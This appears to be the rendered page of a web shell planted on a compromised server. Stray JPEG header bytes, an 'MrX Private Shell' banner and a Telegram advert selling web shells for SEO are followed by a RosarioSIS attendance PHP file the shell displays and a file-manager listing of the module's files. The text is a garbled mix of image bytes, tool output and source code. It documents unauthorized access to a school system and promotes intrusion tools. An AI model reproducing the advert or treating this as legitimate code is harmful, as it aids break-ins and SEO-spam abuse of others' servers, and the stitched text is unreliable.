����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Merge Attendance Chart & Absence Summary
*
* @package RosarioSIS
* @subpackage Attendance
*/
DrawHeader( ProgramTitle() );
$_REQUEST['report'] = issetVal( $_REQUEST['report'], '' );
$report_link = PreparePHP_SELF(
[],
[ 'report', 'attendance' ]
) . '&report=';
$tmp_allow_edit = false;
if ( ! AllowEdit() )
{
// Temporary AllowEdit for non admin users for SelectIpnut display.
$_ROSARIO['allow_edit'] = true;
$tmp_allow_edit = true;
}
$report_select = SelectInput(
$_REQUEST['report'],
'report',
'',
[
'' => ( User( 'PROFILE' ) === 'admin' || User( 'PROFILE' ) === 'teacher' ?
_( 'Attendance Chart' ) :
_( 'Daily Summary' ) ),
'absence' => _( 'Absence Summary' ),
],
false,
'onchange="' . AttrEscape( 'ajaxLink(' . json_encode( $report_link ) . ' + this.value);' ) . '" autocomplete="off"',
false
);
if ( $tmp_allow_edit )
{
// Remove temporary AllowEdit for non admin users for SelectIpnut display.
$_ROSARIO['allow_edit'] = false;
}
DrawHeader( $report_select );
if ( $_REQUEST['report'] === 'absence' )
{
require_once 'modules/Attendance/includes/StudentSummary.php';
}
else
{
require_once 'modules/Attendance/includes/DailySummary.php';
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| AddAbsences.php | File | 10.68 KB | 0644 |
|
| Administration.php | File | 21.38 KB | 0644 |
|
| Administration_fast.old.php | File | 11.57 KB | 0644 |
|
| AttendanceCodes.php | File | 8.51 KB | 0644 |
|
| DailySummary.php | File | 1.17 KB | 0644 |
|
| DuplicateAttendance.php | File | 11.19 KB | 0644 |
|
| FixDailyAttendance.php | File | 2.25 KB | 0644 |
|
| Menu.php | File | 1.6 KB | 0644 |
|
| Percent.php | File | 11.72 KB | 0644 |
|
| TakeAttendance.php | File | 17.1 KB | 0644 |
|
| TeacherCompletion.php | File | 7.7 KB | 0644 |
|